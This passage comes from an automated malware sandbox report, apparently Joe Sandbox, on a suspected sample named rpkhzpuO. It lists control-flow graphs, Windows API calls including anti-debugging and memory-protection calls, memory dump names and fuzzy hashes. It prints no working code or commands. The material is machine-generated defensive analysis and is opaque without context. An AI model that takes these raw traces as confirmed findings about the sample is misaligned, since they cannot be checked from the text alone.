                                                                                                                              • ExitProcess.KERNEL32 ref: 0040E7FF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2427264223-0
                                                                                                                              • Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                              • Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
                                                                                                                              • Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                              • Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 235 36cd2060-36cd20e2 239 36cd20e8-36cd210d 235->239 240 36cd2326-36cd2359 235->240 245 36cd2360-36cd2395 239->245 246 36cd2113-36cd2138 239->246 240->245 253 36cd239c-36cd23d1 245->253 246->253 254 36cd213e-36cd214e 246->254 259 36cd23d8-36cd2404 253->259 254->259 260 36cd2154-36cd2158 254->260 267 36cd240b-36cd2449 259->267 262 36cd215a-36cd2160 260->262 263 36cd2166-36cd216b 260->263 262->263 262->267 264 36cd216d-36cd2173 263->264 265 36cd2179-36cd217f 263->265 264->265 269 36cd2450-36cd248e 264->269 270 36cd2181-36cd2189 265->270 271 36cd2190-36cd21a4 265->271 267->269 304 36cd2495-36cd250a 269->304 270->271 283 36cd21aa 271->283 284 36cd21a6-36cd21a8 271->284 287 36cd21af-36cd21c7 283->287 284->287 289 36cd21c9-36cd21cf 287->289 290 36cd21d1-36cd21d5 287->290 289->290 292 36cd2224-36cd2231 289->292 293 36cd2218-36cd2221 290->293 294 36cd21d7-36cd2203 GetActiveWindow 290->294 302 36cd2271 292->302 303 36cd2233-36cd2249 call 36cd1f90 292->303 293->292 295 36cd220c-36cd2216 294->295 296 36cd2205-36cd220b 294->296 295->292 296->295 331 36cd2271 call 36cd2daf 302->331 332 36cd2271 call 36cd2de8 302->332 333 36cd2271 call 36cd2de0 302->333 313 36cd2268-36cd226e 303->313 314 36cd224b-36cd2262 303->314 306 36cd2277-36cd22a0 call 36cd1f9c 315 36cd22a5-36cd22d5 306->315 313->302 314->304 314->313 315->240 331->306 332->306 333->306
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000002.2629987340.0000000036CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36CD0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_2_36cd0000_rpkhzpuO.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ActiveWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2558294473-0
                                                                                                                              • Opcode ID: e989e393c56cd420a6488cbc05d6b275f5139ce53865896dba5fd1922d258d52
                                                                                                                              • Instruction ID: 5ddb2f373d2732f07d3dae6920362bd8952e7716e844fc476b365005da6aca5c
                                                                                                                              • Opcode Fuzzy Hash: e989e393c56cd420a6488cbc05d6b275f5139ce53865896dba5fd1922d258d52
                                                                                                                              • Instruction Fuzzy Hash: CAB17374F002498FDB099FB5C4247AD7BA6BF88310F248529E606EB390DF399C46CB65

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 334 36cd205b-36cd20e2 339 36cd20e8-36cd210d 334->339 340 36cd2326-36cd2359 334->340 345 36cd2360-36cd2395 339->345 346 36cd2113-36cd2138 339->346 340->345 353 36cd239c-36cd23d1 345->353 346->353 354 36cd213e-36cd214e 346->354 359 36cd23d8-36cd2404 353->359 354->359 360 36cd2154-36cd2158 354->360 367 36cd240b-36cd2449 359->367 362 36cd215a-36cd2160 360->362 363 36cd2166-36cd216b 360->363 362->363 362->367 364 36cd216d-36cd2173 363->364 365 36cd2179-36cd217f 363->365 364->365 369 36cd2450-36cd248e 364->369 370 36cd2181-36cd2189 365->370 371 36cd2190-36cd21a4 365->371 367->369 404 36cd2495-36cd250a 369->404 370->371 383 36cd21aa 371->383 384 36cd21a6-36cd21a8 371->384 387 36cd21af-36cd21c7 383->387 384->387 389 36cd21c9-36cd21cf 387->389 390 36cd21d1-36cd21d5 387->390 389->390 392 36cd2224-36cd2231 389->392 393 36cd2218-36cd2221 390->393 394 36cd21d7-36cd2203 GetActiveWindow 390->394 402 36cd2271 392->402 403 36cd2233-36cd2249 call 36cd1f90 392->403 393->392 395 36cd220c-36cd2216 394->395 396 36cd2205-36cd220b 394->396 395->392 396->395 431 36cd2271 call 36cd2daf 402->431 432 36cd2271 call 36cd2de8 402->432 433 36cd2271 call 36cd2de0 402->433 413 36cd2268-36cd226e 403->413 414 36cd224b-36cd2262 403->414 406 36cd2277-36cd22a0 call 36cd1f9c 415 36cd22a5-36cd22d5 406->415 413->402 414->404 414->413 415->340 431->406 432->406 433->406
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000002.2629987340.0000000036CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36CD0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_2_36cd0000_rpkhzpuO.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ActiveWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2558294473-0
                                                                                                                              • Opcode ID: 2d5877a33639ff99d1c610506df27cb66b322d512167b30582b2c44fc2fcfbaf
                                                                                                                              • Instruction ID: 4dcc6caa400e51980185d1580aea1b557c51d64f51f91bc7751183ef90c8f40b
                                                                                                                              • Opcode Fuzzy Hash: 2d5877a33639ff99d1c610506df27cb66b322d512167b30582b2c44fc2fcfbaf
                                                                                                                              • Instruction Fuzzy Hash: A5614C74E10359DFEB049FA5C844B9EBBF6FF88310F148429EA05EB290DB399846CB55

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 434 36cd54c8-36cd556b GetCurrentThreadId 438 36cd556d-36cd5573 434->438 439 36cd5574-36cd55b5 call 36cd4364 434->439 438->439
                                                                                                                              APIs
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 36CD555A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000002.2629987340.0000000036CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36CD0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_2_36cd0000_rpkhzpuO.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CurrentThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2882836952-0
                                                                                                                              • Opcode ID: 9341cbb8de171a72d9003ead077e498466e8ca1cb2e7e59f945e83d4dfdeb490
                                                                                                                              • Instruction ID: c91bfaf38e753c4bf7142eeef4682e1f6f9b3992d2c90313c51204b3de9b1e2c
                                                                                                                              • Opcode Fuzzy Hash: 9341cbb8de171a72d9003ead077e498466e8ca1cb2e7e59f945e83d4dfdeb490
                                                                                                                              • Instruction Fuzzy Hash: C03125B090424A8FCB01DFA9C844ADEBFF1FF49310F14855AD658AB352D334A946CFA5

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 444 36cd38e3-36cd397c DuplicateHandle 445 36cd397e-36cd3984 444->445 446 36cd3985-36cd39a2 444->446 445->446
                                                                                                                              APIs
                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 36CD396F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000002.2629987340.0000000036CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36CD0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_2_36cd0000_rpkhzpuO.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DuplicateHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3793708945-0
                                                                                                                              • Opcode ID: 564b522cf480db669b68f3db25fc443625c01affeb42660967ea0d2df7bb5264
                                                                                                                              • Instruction ID: 473a1726d6b5872b4930c30bf240b0e7e8a30547294c9f3684fe5fef7d47294f
                                                                                                                              • Opcode Fuzzy Hash: 564b522cf480db669b68f3db25fc443625c01affeb42660967ea0d2df7bb5264
                                                                                                                              • Instruction Fuzzy Hash: BD21E4B5D00248EFDB10CFAAD984ADEFBF4EB48320F14841AE958A3350D374A954CFA4

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 449 36cd55c0-36cd560a 450 36cd560c 449->450 451 36cd5616-36cd5646 EnumThreadWindows 449->451 454 36cd5614 450->454 452 36cd564f-36cd567c 451->452 453 36cd5648-36cd564e 451->453 453->452 454->451
                                                                                                                              APIs
                                                                                                                              • EnumThreadWindows.USER32(?,00000000,?), ref: 36CD5639
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000002.2629987340.0000000036CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36CD0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_2_36cd0000_rpkhzpuO.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: EnumThreadWindows
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2941952884-0
                                                                                                                              • Opcode ID: ffa76b89b6ba1e30780bd1d961a16deb68e7edbb9a4b01aad6773ac7f4f1e470
                                                                                                                              • Instruction ID: f2a9ac23f940fb6a69fc9a65f0fb8ed1ad45f16c463818ed7e11f02d5d59bcc5
                                                                                                                              • Opcode Fuzzy Hash: ffa76b89b6ba1e30780bd1d961a16deb68e7edbb9a4b01aad6773ac7f4f1e470
                                                                                                                              • Instruction Fuzzy Hash: 272115B5D002198FDB10DFAAC944BEEFBF9EB88320F54842AD519A3350D778A945CF64

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 457 36cd38e8-36cd397c DuplicateHandle 458 36cd397e-36cd3984 457->458 459 36cd3985-36cd39a2 457->459 458->459
                                                                                                                              APIs
                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 36CD396F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000002.2629987340.0000000036CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36CD0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_2_36cd0000_rpkhzpuO.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DuplicateHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3793708945-0
                                                                                                                              • Opcode ID: a2f1cdcc4eb44474d87e25d1ddbd9fbe6904175e83f51d318caab354fe27c6d3
                                                                                                                              • Instruction ID: c68e9f77534f7a5c8db23fdc95e4dccf2cf7698e697fc2b9e56e1484dee3d1ed
                                                                                                                              • Opcode Fuzzy Hash: a2f1cdcc4eb44474d87e25d1ddbd9fbe6904175e83f51d318caab354fe27c6d3
                                                                                                                              • Instruction Fuzzy Hash: 3121E4B5D00248DFDB10CFAAD984ADEFBF4EB48320F14841AE918A3350D374A954CFA0

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 462 36cd5950-36cd599b 464 36cd599d-36cd59a0 462->464 465 36cd59a3-36cd59a7 462->465 464->465 466 36cd59af-36cd59e2 MessageBoxW 465->466 467 36cd59a9-36cd59ac 465->467 468 36cd59eb-36cd59ff 466->468 469 36cd59e4-36cd59ea 466->469 467->466 469->468
                                                                                                                              APIs
                                                                                                                              • MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,36CD22A5,?,?,?), ref: 36CD59D5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000002.2629987340.0000000036CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36CD0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_2_36cd0000_rpkhzpuO.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Message
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2030045667-0
                                                                                                                              • Opcode ID: 7e787c7ec60abe978f889d8f544c5cf60e6346dc8d4c72eb5bd1f0004868b5a1
                                                                                                                              • Instruction ID: ebc90ed284392be6766cf12de7f0238a6aec66b11923d44692350adbe3ab9916
                                                                                                                              • Opcode Fuzzy Hash: 7e787c7ec60abe978f889d8f544c5cf60e6346dc8d4c72eb5bd1f0004868b5a1
                                                                                                                              • Instruction Fuzzy Hash: 5E2125B9D003099FCB10CF9AD884ADEBBB4FB88310F50851EE958A7200C375A945CFA1

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 471 36cd1f9c-36cd599b 473 36cd599d-36cd59a0 471->473 474 36cd59a3-36cd59a7 471->474 473->474 475 36cd59af-36cd59e2 MessageBoxW 474->475 476 36cd59a9-36cd59ac 474->476 477 36cd59eb-36cd59ff 475->477 478 36cd59e4-36cd59ea 475->478 476->475 478->477
                                                                                                                              APIs
                                                                                                                              • MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,36CD22A5,?,?,?), ref: 36CD59D5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000002.2629987340.0000000036CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36CD0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_2_36cd0000_rpkhzpuO.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Message
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2030045667-0
                                                                                                                              • Opcode ID: d62ab6f699541f82c85c42d0a345a005533318bda1a3ca7c58befe4393a1667b
                                                                                                                              • Instruction ID: af4a58a78c227c94eb43e82131b5def56b317394ec65558b2b2033c383875f22
                                                                                                                              • Opcode Fuzzy Hash: d62ab6f699541f82c85c42d0a345a005533318bda1a3ca7c58befe4393a1667b
                                                                                                                              • Instruction Fuzzy Hash: EB2137B5D003499FCB10CF9AD884ADEFBF4FB88310F50851EE618A7201C374A945CBA0

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 480 36cd55c8-36cd560a 481 36cd560c 480->481 482 36cd5616-36cd5646 EnumThreadWindows 480->482 485 36cd5614 481->485 483 36cd564f-36cd567c 482->483 484 36cd5648-36cd564e 482->484 484->483 485->482
                                                                                                                              APIs
                                                                                                                              • EnumThreadWindows.USER32(?,00000000,?), ref: 36CD5639
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000002.2629987340.0000000036CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36CD0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_2_36cd0000_rpkhzpuO.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: EnumThreadWindows
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2941952884-0
                                                                                                                              • Opcode ID: 09a37f2d107ff714bb4fe9249b581f641dec66889286273e594c5da589f927b3
                                                                                                                              • Instruction ID: cbccfe67c95ed5201818160ce4839b3ad61bb02f8a281dac0502d3ced6e4e56e
                                                                                                                              • Opcode Fuzzy Hash: 09a37f2d107ff714bb4fe9249b581f641dec66889286273e594c5da589f927b3
                                                                                                                              • Instruction Fuzzy Hash: 9A2115B1D002098FDB10DFAAC844BEEFBF4EB88320F54842AD514A3350D778A945CF64
                                                                                                                              APIs
                                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 336B91A4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000002.2556555640.00000000336B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 336B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_2_336b0000_rpkhzpuO.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ProtectVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 544645111-0
                                                                                                                              • Opcode ID: 2cea0c05cde0e5c6d76bccf3e819c67d076d73b768cf093de68d6c36460b41f9
                                                                                                                              • Instruction ID: 3e2f3f56ec44d26654a6d7e2bfc72413fd05cc311d29ca90da1e263557a4173e
                                                                                                                              • Opcode Fuzzy Hash: 2cea0c05cde0e5c6d76bccf3e819c67d076d73b768cf093de68d6c36460b41f9
                                                                                                                              • Instruction Fuzzy Hash: DE1127B1D002099FDB10DFAAC884AAEFBF4AF48320F14841AD519A7240C7759900CFA0
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                                                              • SysAllocString.OLEAUT32 ref: 00401898
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocString_malloc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 959018026-0
                                                                                                                              • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                              • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                                                                                              • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                              • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
                                                                                                                              APIs
                                                                                                                              • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateHeap
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 10892065-0
                                                                                                                              • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                              • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                                                              • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                              • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                                                                              APIs
                                                                                                                              • _doexit.LIBCMT ref: 0040EA16
                                                                                                                                • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
                                                                                                                                • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
                                                                                                                                • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
                                                                                                                                • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
                                                                                                                                • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
                                                                                                                                • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
                                                                                                                                • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
                                                                                                                                • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1597249276-0
                                                                                                                              • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                              • Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
                                                                                                                              • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                              • Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000002.2556555640.00000000336B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 336B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_2_336b0000_rpkhzpuO.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2962429428-0
                                                                                                                              • Opcode ID: e56c0239905fe3a803da855ab60c909ed04b0ac41d181295061ac1e543408cfc
                                                                                                                              • Instruction ID: ad0dd860250fc12f86eaa204436558f77a1d40880a189858c734edf6b856f528
                                                                                                                              • Opcode Fuzzy Hash: e56c0239905fe3a803da855ab60c909ed04b0ac41d181295061ac1e543408cfc
                                                                                                                              • Instruction Fuzzy Hash: FD1136B1D003498FDB10DFAAD8457EEFBF4AF88620F24881AD519A7240C779A940CFA4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000002.2532294504.0000000031B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 31B9D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_2_31b9d000_rpkhzpuO.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a69779598dd5d31c02de8758c245efa7018d3a93f7e97b47dc1a661c99f7dbf8
                                                                                                                              • Instruction ID: ba9c47a23c6ad4912a266fd6e087a535ed35b109258263c433333a2af750332f
                                                                                                                              • Opcode Fuzzy Hash: a69779598dd5d31c02de8758c245efa7018d3a93f7e97b47dc1a661c99f7dbf8
                                                                                                                              • Instruction Fuzzy Hash: 5321F875504384DFEB0ADF15DDC0B4ABF66FB88394F248679E9080B246C33AD457CAA2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000002.2532294504.0000000031B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 31B9D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_2_31b9d000_rpkhzpuO.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7e19b8849574f69084d3a2b900cad5df28e11347f1f339390478c48b27048c21
                                                                                                                              • Instruction ID: cdaae7ac9df7df961fc571100a092a5bd682a223cacb3810b7312aaa2827060b
                                                                                                                              • Opcode Fuzzy Hash: 7e19b8849574f69084d3a2b900cad5df28e11347f1f339390478c48b27048c21
                                                                                                                              • Instruction Fuzzy Hash: 8711D37A504284CFDB06DF10D9C0B4ABF72FB84314F24C6A9D8090B656C33AD45BCBA2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000002.2532294504.0000000031B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 31B9D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_2_31b9d000_rpkhzpuO.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a4972da9b77c53e865ccf3fc5a94e1f95fabc96a97de060335383ef3c962649b
                                                                                                                              • Instruction ID: f9baf79c9d29070152db294ca55b983211c5094bc73c695e39924bfaf26cdfc4
                                                                                                                              • Opcode Fuzzy Hash: a4972da9b77c53e865ccf3fc5a94e1f95fabc96a97de060335383ef3c962649b
                                                                                                                              • Instruction Fuzzy Hash: 4D01F271504354EAF3158F26CD90B96BF98EF4A3E0F08862AED481B282C7799803C6B1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000002.2532294504.0000000031B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 31B9D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_2_31b9d000_rpkhzpuO.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: bd83587e9620c8e3674c582e5520d00bd3de663c73df745340cdc0fc4f8de922
                                                                                                                              • Instruction ID: 22677668e4dfeca81a1a7fb6a9f1825a930b8f2b1bcb52ab3c99f3aa6146c3b9
                                                                                                                              • Opcode Fuzzy Hash: bd83587e9620c8e3674c582e5520d00bd3de663c73df745340cdc0fc4f8de922
                                                                                                                              • Instruction Fuzzy Hash: B301927110E3C09FE3174B258CA4B52BFB4EF47264F0980DBD9888F293C2695845C772
                                                                                                                              APIs
                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                              • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2579439406-0
                                                                                                                              • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                              • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                              • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                              • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                              APIs
                                                                                                                              • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                              • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,338618E8), ref: 004170C5
                                                                                                                              • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                              • _malloc.LIBCMT ref: 0041718A
                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
